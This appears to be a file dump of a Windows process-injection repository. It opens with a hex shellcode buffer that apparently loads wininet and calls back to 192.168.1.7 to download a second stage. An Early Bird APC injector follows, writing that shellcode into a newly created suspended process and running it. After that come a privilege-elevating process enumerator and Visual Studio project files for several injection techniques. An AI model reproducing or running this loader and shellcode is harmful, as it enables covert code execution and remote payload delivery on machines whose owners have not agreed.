| "\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48" 47 | "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" 48 | "\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e\x69" 49 | "\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c\x77\x26" 50 | "\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31\xc0\x4d\x31" 51 | "\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5" 52 | "\xe8\x0c\x00\x00\x00\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e" 53 | "\x37\x00\x5a\x48\x89\xc1\x49\xc7\xc0\xea\x0c\x00\x00\x4d\x31" 54 | "\xc9\x53\x53\x6a\x03\x53\x49\xba\x57\x89\x9f\xc6\x00\x00\x00" 55 | "\x00\xff\xd5\xe8\xa5\x00\x00\x00\x2f\x43\x4c\x6f\x55\x55\x63" 56 | "\x34\x79\x58\x30\x6c\x69\x32\x47\x50\x61\x41\x49\x36\x57\x63" 57 | "\x77\x5f\x6a\x45\x55\x6a\x61\x4e\x72\x37\x7a\x72\x6b\x46\x33" 58 | "\x35\x41\x32\x7a\x79\x35\x4d\x5f\x6a\x41\x6b\x51\x6c\x70\x45" 59 | "\x38\x34\x38\x49\x47\x62\x6e\x33\x6a\x4f\x6c\x55\x6b\x6e\x6f" 60 | "\x6c\x77\x6c\x50\x77\x4e\x54\x47\x53\x4a\x66\x39\x30\x33\x62" 61 | "\x62\x42\x49\x53\x6b\x4c\x4c\x57\x6e\x52\x43\x38\x77\x4a\x6d" 62 | "\x56\x44\x78\x64\x71\x57\x77\x54\x65\x6a\x35\x74\x2d\x64\x78" 63 | "\x64\x42\x4d\x5f\x63\x44\x55\x59\x30\x4e\x5a\x74\x35\x2d\x4b" 64 | "\x54\x6b\x56\x37\x37\x78\x79\x61\x63\x36\x44\x78\x71\x42\x6a" 65 | "\x62\x54\x4f\x76\x56\x34\x76\x69\x50\x5f\x4c\x63\x57\x66\x34" 66 | "\x51\x6d\x30\x79\x74\x6d\x4b\x00\x48\x89\xc1\x53\x5a\x41\x58" 67 | "\x4d\x31\xc9\x53\x48\xb8\x00\x32\xa8\x84\x00\x00\x00\x00\x50" 68 | "\x53\x53\x49\xc7\xc2\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x6a" 69 | "\x0a\x5f\x48\x89\xf1\x6a\x1f\x5a\x52\x68\x80\x33\x00\x00\x49" 70 | "\x89\xe0\x6a\x04\x41\x59\x49\xba\x75\x46\x9e\x86\x00\x00\x00" 71 | "\x00\xff\xd5\x4d\x31\xc0\x53\x5a\x48\x89\xf1\x4d\x31\xc9\x4d" 72 | "\x31\xc9\x53\x53\x49\xc7\xc2\x2d\x06\x18\x7b\xff\xd5\x85\xc0" 73 | "\x75\x1f\x48\xc7\xc1\x88\x13\x00\x00\x49\xba\x44\xf0\x35\xe0" 74 | "\x00\x00\x00\x00\xff\xd5\x48\xff\xcf\x74\x02\xeb\xaa\xe8\x55" 75 | "\x00\x00\x00\x53\x59\x6a\x40\x5a\x49\x89\xd1\xc1\xe2\x10\x49" 76 | "\xc7\xc0\x00\x10\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00" 77 | "\x00\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89" 78 | "\xda\x49\xc7\xc0\x00\x20\x00\x00\x49\x89\xf9\x49\xba\x12\x96" 79 | "\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74" 80 | "\xb2\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd2\x58\xc3\x58\x6a" 81 | "\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff\xd5"; 82 | 83 | 84 | LPSTARTUPINFOA lpSi = (LPSTARTUPINFOA)VirtualAlloc(nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 85 | LPPROCESS_INFORMATION lpPi = (LPPROCESS_INFORMATION)VirtualAlloc(nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 86 | if (lpSi == nullptr || lpPi == nullptr) { 87 | PrintError("VirtualAlloc()", TRUE); 88 | return 0x1; 89 | } 90 | lpSi->cb = sizeof(STARTUPINFOA); 91 | 92 | // start a process in suspended mode, this will be in alertable (done by kernel) 93 | if (!CreateProcessA(nullptr, argv[1], nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, lpSi, lpPi)) { 94 | PrintError("CreateProcessA()", TRUE); 95 | } 96 | 97 | LPVOID lpBuff = VirtualAllocEx(lpPi->hProcess , nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 98 | if (lpBuff == nullptr) { 99 | PrintError("VirtualAllocEx()", TRUE); 100 | return 0x1; 101 | } 102 | 103 | WriteProcessMemory(lpPi->hProcess, lpBuff, (LPCVOID)buf, 449, nullptr); 104 | QueueUserAPC((PAPCFUNC)lpBuff, lpPi->hThread, NULL); 105 | 106 | // continue the main thread execution 107 | ResumeThread(lpPi->hThread); 108 | 109 | return 0x0; 110 | } -------------------------------------------------------------------------------- /Process Listing/PS Api/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "Shlwapi.lib") 6 | 7 | // Include the PSAPI library based on the version 8 | #if PSAPI_VERSION == 0x1 9 | #pragma comment(lib, "Psapi.lib") 10 | #else 11 | #pragma comment(lib, "Kernel32.lib") 12 | #endif 13 | 14 | 15 | int main(VOID) { 16 | // Force add SeDebugPrivilege to the process's token 17 | if (!AddSeDebugPrivileges()) { 18 | SpawnElevatedProcess(); 19 | } 20 | 21 | /* 22 | When the process count is equal to the dwLimit, then there may be other processes failed to fit in the buffer because of low memory. 23 | Enumerate the processes until all of them fits in the buffer by doubling its size again and again. 24 | */ 25 | DWORD dwNeeded, dwLimit = 0x50, dwCount = 0x50; 26 | PDWORD lpProcesses = nullptr; 27 | while (dwCount == dwLimit) { 28 | VirtualFree(lpProcesses, NULL, MEM_RELEASE); 29 | 30 | if (lpProcesses != nullptr) dwLimit <<= 1; 31 | lpProcesses = (PDWORD)VirtualAlloc(nullptr, sizeof(DWORD) * dwLimit, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // Enumerate processes and populate into the buffer 34 | if (!EnumProcesses(lpProcesses, sizeof(DWORD) * dwLimit, &dwNeeded)) { 35 | VirtualFree(lpProcesses, NULL, MEM_RELEASE); 36 | PrintError("EnumProcesses()", TRUE); 37 | } 38 | 39 | dwCount = dwNeeded / sizeof(DWORD); 40 | } 41 | 42 | std::cout << "Total Processes: " << dwCount << std::endl; 43 | 44 | /* 45 | Print the process detail 46 | */ 47 | for (DWORD i = 0;i < dwCount;i++) { 48 | DWORD dwPID = *(lpProcesses + i); 49 | if (dwPID == 0x0) continue; 50 | std::cout << "Process ID: " << dwPID; 51 | 52 | // Open process with information query access rights 53 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwPID); 54 | if (hProcess == NULL) { 55 | std::cout << std::endl; 56 | PrintError("OpenProcess()"); 57 | std::cout << "-------------------------------------------------\n"; 58 | continue; 59 | } 60 | 61 | // Print the base name of the process 62 | LPSTR lpBaseName = (LPSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 63 | if (!GetModuleBaseNameA(hProcess, NULL, lpBaseName, MAX_PATH)) { 64 | std::cout << std::endl; 65 | PrintError("GetModuleBaseNameA()"); 66 | } else { 67 | std::cout << "\tProcess Name: " << lpBaseName << std::endl; 68 | } 69 | VirtualFree(lpBaseName, 0x0, MEM_RELEASE); 70 | lpBaseName = nullptr; 71 | 72 | // Print the complete image path of the process 73 | // Image is basically the executable file which is being loaded by the loader 74 | LPSTR lpImageName = (LPSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 75 | if (!GetProcessImageFileNameA(hProcess, lpImageName, MAX_PATH)) { 76 | std::cout << std::endl; 77 | PrintError("GetProcessImageFileNameA()"); 78 | 79 | } else { 80 | std::cout << "Process Image: " << lpImageName << std::endl; 81 | } 82 | VirtualFree(lpImageName, 0x0, MEM_RELEASE); 83 | lpImageName = nullptr; 84 | 85 | // Enumerate the process modules 86 | dwLimit = 0x50, dwCount = 0x50; 87 | HMODULE* lpModules = nullptr; 88 | BOOL bModSuccess = TRUE; 89 | std::cout << "Modules List: "; 90 | while (dwLimit == dwCount) { 91 | VirtualFree(lpModules, 0x0, MEM_RELEASE); 92 | 93 | if (lpModules != nullptr) dwLimit <<= 1; 94 | lpModules = (HMODULE*)VirtualAlloc(nullptr, sizeof(HMODULE) * dwLimit, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 95 | 96 | if (!EnumProcessModulesEx(hProcess, lpModules, sizeof(HMODULE) * dwLimit, &dwNeeded, LIST_MODULES_ALL)) { 97 | PrintError("EnumProcessModulesEx()"); 98 | bModSuccess = FALSE; 99 | break; 100 | } 101 | 102 | dwCount = dwNeeded / sizeof(HMODULE); 103 | } 104 | 105 | if (bModSuccess) { 106 | std::cout << dwCount << " modules found" << std::endl; 107 | for (DWORD j = 0;j < dwCount;j++) { 108 | HMODULE hMod = *(lpModules + j); 109 | std::cout << "\tOrdinal Number: " << j; 110 | 111 | // Print the base name of the module 112 | LPSTR lpBaseName = (LPSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 113 | if (!GetModuleBaseNameA(hProcess, hMod, lpBaseName, MAX_PATH)) { 114 | std::cout << std::endl; 115 | PrintError("GetModuleBaseNameA()"); 116 | } else { 117 | std::cout << "\tName: " << lpBaseName << std::endl; 118 | } 119 | VirtualFree(lpBaseName, 0x0, MEM_RELEASE); 120 | lpBaseName = nullptr; 121 | 122 | // Print the file path of the module 123 | LPSTR lpFileName = (LPSTR)VirtualAlloc(nullptr, MAX_PATH, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 124 | if (!GetModuleFileNameExA(hProcess, hMod, lpFileName, MAX_PATH)) { 125 | PrintError("GetModuleFileNameExA()"); 126 | } else { 127 | std::cout << "\tFile Name: " << lpFileName << std::endl; 128 | } 129 | VirtualFree(lpFileName, MAX_PATH, MEM_RELEASE); 130 | lpFileName = nullptr; 131 | 132 | // Print the module related information 133 | LPMODULEINFO lpModInfo = (LPMODULEINFO)VirtualAlloc(nullptr, sizeof(MODULEINFO), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 134 | if (!GetModuleInformation(hProcess, hMod, lpModInfo, sizeof(MODULEINFO))) { 135 | PrintError("GetModuleInformation()"); 136 | } else { 137 | PSTR lpSize = (PSTR)VirtualAlloc(nullptr, 100, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 138 | StrFormatByteSizeA(lpModInfo->SizeOfImage, lpSize, 100); 139 | 140 | std::cout << "\tEntry Point: 0x" << std::hex << lpModInfo->EntryPoint 141 | << "\t\tBase of DLL: 0x" << lpModInfo->lpBaseOfDll 142 | << "\t\tSize of Image: " << std::dec << lpSize << std::endl; 143 | 144 | VirtualFree(lpSize, 0x0, MEM_RELEASE); 145 | lpSize = nullptr; 146 | } 147 | VirtualFree(lpModInfo, 0x0, MEM_RELEASE); 148 | lpModInfo = nullptr; 149 | 150 | std::cout << "\t----------------------\n"; 151 | } 152 | } 153 | VirtualFree(lpModules, 0x0, MEM_RELEASE); 154 | lpModules = nullptr; 155 | 156 | std::cout << "-------------------------------------------------\n"; 157 | } 158 | 159 | 160 | VirtualFree(lpProcesses, NULL, MEM_RELEASE); 161 | lpProcesses = nullptr; 162 | return 0; 163 | } -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/Thread Hijacking.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {f9781285-62ee-4321-8ef0-ba898034dcc2} 25 | ThreadHijacking 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /Process Injection/Process Injection.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.1.32328.378 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateRemoteThread DLL", "CreateRemoteThread DLL\CreateRemoteThread DLL.vcxproj", "{4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateRemoteThread Shellcode", "CreateRemoteThread Shellcode\CreateRemoteThread Shellcode.vcxproj", "{66704FF5-8962-42FA-8B22-51D207A0853F}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "APC Thread Injection", "APC Thread Injection\APC Thread Injection.vcxproj", "{98EBCC7B-5E31-4D4F-9554-EB380F6773AB}" 11 | EndProject 12 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "CreateRemoteThread Technique", "CreateRemoteThread Technique", "{7C391A38-3479-4A98-8100-6F9B971AD355}" 13 | EndProject 14 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "APC Thread Technique", "APC Thread Technique", "{84601031-D80B-4FAF-A867-E5D704C2DC1F}" 15 | EndProject 16 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Targets", "Targets", "{BC4A74AB-0310-47DD-8F47-C3839B091687}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AlertableSleep", "AlertableSleep\AlertableSleep.vcxproj", "{7C958BA4-4EBB-4381-BE12-B780F15B2D35}" 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EarlyBird APC", "EarlyBird APC\EarlyBird APC.vcxproj", "{F725D431-7D99-429E-8E73-E7737669C302}" 21 | EndProject 22 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Misc", "Misc", "{EFCA2A9E-DA75-4CAF-AF3B-F004F437FBC9}" 23 | EndProject 24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Thread Hijacking", "Thread Hijacking\Thread Hijacking.vcxproj", "{F9781285-62EE-4321-8EF0-BA898034DCC2}" 25 | EndProject 26 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MessageBox", "MessageBox\MessageBox.vcxproj", "{55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}" 27 | EndProject 28 | Global 29 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 30 | Debug|x64 = Debug|x64 31 | Debug|x86 = Debug|x86 32 | Release|x64 = Release|x64 33 | Release|x86 = Release|x86 34 | EndGlobalSection 35 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 36 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Debug|x64.ActiveCfg = Debug|x64 37 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Debug|x64.Build.0 = Debug|x64 38 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Debug|x86.ActiveCfg = Debug|Win32 39 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Debug|x86.Build.0 = Debug|Win32 40 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Release|x64.ActiveCfg = Release|x64 41 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Release|x64.Build.0 = Release|x64 42 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Release|x86.ActiveCfg = Release|Win32 43 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8}.Release|x86.Build.0 = Release|Win32 44 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Debug|x64.ActiveCfg = Debug|x64 45 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Debug|x64.Build.0 = Debug|x64 46 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Debug|x86.ActiveCfg = Debug|Win32 47 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Debug|x86.Build.0 = Debug|Win32 48 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Release|x64.ActiveCfg = Release|x64 49 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Release|x64.Build.0 = Release|x64 50 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Release|x86.ActiveCfg = Release|Win32 51 | {66704FF5-8962-42FA-8B22-51D207A0853F}.Release|x86.Build.0 = Release|Win32 52 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Debug|x64.ActiveCfg = Debug|x64 53 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Debug|x64.Build.0 = Debug|x64 54 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Debug|x86.ActiveCfg = Debug|Win32 55 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Debug|x86.Build.0 = Debug|Win32 56 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Release|x64.ActiveCfg = Release|x64 57 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Release|x64.Build.0 = Release|x64 58 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Release|x86.ActiveCfg = Release|Win32 59 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB}.Release|x86.Build.0 = Release|Win32 60 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Debug|x64.ActiveCfg = Debug|x64 61 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Debug|x64.Build.0 = Debug|x64 62 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Debug|x86.ActiveCfg = Debug|Win32 63 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Debug|x86.Build.0 = Debug|Win32 64 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Release|x64.ActiveCfg = Release|x64 65 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Release|x64.Build.0 = Release|x64 66 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Release|x86.ActiveCfg = Release|Win32 67 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35}.Release|x86.Build.0 = Release|Win32 68 | {F725D431-7D99-429E-8E73-E7737669C302}.Debug|x64.ActiveCfg = Debug|x64 69 | {F725D431-7D99-429E-8E73-E7737669C302}.Debug|x64.Build.0 = Debug|x64 70 | {F725D431-7D99-429E-8E73-E7737669C302}.Debug|x86.ActiveCfg = Debug|Win32 71 | {F725D431-7D99-429E-8E73-E7737669C302}.Debug|x86.Build.0 = Debug|Win32 72 | {F725D431-7D99-429E-8E73-E7737669C302}.Release|x64.ActiveCfg = Release|x64 73 | {F725D431-7D99-429E-8E73-E7737669C302}.Release|x64.Build.0 = Release|x64 74 | {F725D431-7D99-429E-8E73-E7737669C302}.Release|x86.ActiveCfg = Release|Win32 75 | {F725D431-7D99-429E-8E73-E7737669C302}.Release|x86.Build.0 = Release|Win32 76 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Debug|x64.ActiveCfg = Debug|x64 77 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Debug|x64.Build.0 = Debug|x64 78 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Debug|x86.ActiveCfg = Debug|Win32 79 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Debug|x86.Build.0 = Debug|Win32 80 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Release|x64.ActiveCfg = Release|x64 81 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Release|x64.Build.0 = Release|x64 82 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Release|x86.ActiveCfg = Release|Win32 83 | {F9781285-62EE-4321-8EF0-BA898034DCC2}.Release|x86.Build.0 = Release|Win32 84 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Debug|x64.ActiveCfg = Debug|x64 85 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Debug|x64.Build.0 = Debug|x64 86 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Debug|x86.ActiveCfg = Debug|Win32 87 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Debug|x86.Build.0 = Debug|Win32 88 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Release|x64.ActiveCfg = Release|x64 89 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Release|x64.Build.0 = Release|x64 90 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Release|x86.ActiveCfg = Release|Win32 91 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E}.Release|x86.Build.0 = Release|Win32 92 | EndGlobalSection 93 | GlobalSection(SolutionProperties) = preSolution 94 | HideSolutionNode = FALSE 95 | EndGlobalSection 96 | GlobalSection(NestedProjects) = preSolution 97 | {4AEEC15D-90B6-4040-BC62-2ACF7EF347D8} = {7C391A38-3479-4A98-8100-6F9B971AD355} 98 | {66704FF5-8962-42FA-8B22-51D207A0853F} = {7C391A38-3479-4A98-8100-6F9B971AD355} 99 | {98EBCC7B-5E31-4D4F-9554-EB380F6773AB} = {84601031-D80B-4FAF-A867-E5D704C2DC1F} 100 | {7C958BA4-4EBB-4381-BE12-B780F15B2D35} = {BC4A74AB-0310-47DD-8F47-C3839B091687} 101 | {F725D431-7D99-429E-8E73-E7737669C302} = {84601031-D80B-4FAF-A867-E5D704C2DC1F} 102 | {F9781285-62EE-4321-8EF0-BA898034DCC2} = {EFCA2A9E-DA75-4CAF-AF3B-F004F437FBC9} 103 | {55E1AF52-3CAE-4C01-AEB9-9B90D797C65E} = {BC4A74AB-0310-47DD-8F47-C3839B091687} 104 | EndGlobalSection 105 | GlobalSection(ExtensibilityGlobals) = postSolution 106 | SolutionGuid = {F7CADB2F-2F2E-4A25-9771-DEF7C05374A5} 107 | EndGlobalSection 108 | EndGlobal 109 | -------------------------------------------------------------------------------- /Process Injection/AlertableSleep/AlertableSleep.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {7c958ba4-4ebb-4381-be12-b780f15b2d35} 25 | AlertableSleep 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /Process ReadWrite/Victim Process/Victim Process.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {cec28e83-9dfa-4d37-9b08-2cf4c2ce0a6f} 25 | VictimProcess 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /Process Listing/PS Api/PS Api.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {3cb124c3-8199-4934-9452-66752ba0227a} 25 | PSApi 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /Process Listing/WTS Api/WTS Api.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | 